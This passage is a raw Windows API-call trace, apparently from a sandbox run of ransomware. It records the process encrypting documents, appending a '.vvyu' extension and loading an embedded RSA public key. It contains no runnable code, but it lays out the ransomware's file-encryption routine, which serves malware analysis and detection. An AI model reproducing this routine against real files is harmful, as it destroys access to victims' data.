lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.135] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.136] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.136] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.136] CloseHandle (hObject=0x584) returned 1 [0189.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af1f88 [0189.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.138] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\kLC6o4xsmRx_iA iEAy2.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\klc6o4xsmrx_ia ieay2.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\kLC6o4xsmRx_iA iEAy2.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\klc6o4xsmrx_ia ieay2.docx.vvyu")) returned 1 [0189.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.139] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0189.142] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd03d810, ftCreationTime.dwHighDateTime=0x1d8683b, ftLastAccessTime.dwLowDateTime=0x14e91f60, ftLastAccessTime.dwHighDateTime=0x1d89d01, ftLastWriteTime.dwLowDateTime=0x14e91f60, ftLastWriteTime.dwHighDateTime=0x1d89d01, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LIaaFON99laH9NU_j.xlsx", cAlternateFileName="LIAAFO~1.XLS")) returned 1 [0189.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ad0 [0189.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0189.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2ad0 | out: hHeap=0x2c0000) returned 1 [0189.142] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\LIaaFON99laH9NU_j.xlsx") returned=".xlsx" [0189.142] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\LIaaFON99laH9NU_j.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\liaafon99lah9nu_j.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.144] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=94098) returned 1 [0189.144] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.147] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16f6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.148] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.150] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.150] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16f92, lpOverlapped=0x0) returned 1 [0189.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.151] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.152] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.153] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.153] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.153] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.153] GetLastError () returned 0x0 [0189.153] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.153] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.153] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.153] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.153] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16f90) returned 0x2af5168 [0189.154] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ad0 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b18 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.155] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0daa8 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.158] GetCurrentThreadId () returned 0x5d8 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4188 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.159] GetCurrentThreadId () returned 0x5d8 [0189.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2b18 | out: hHeap=0x2c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.167] 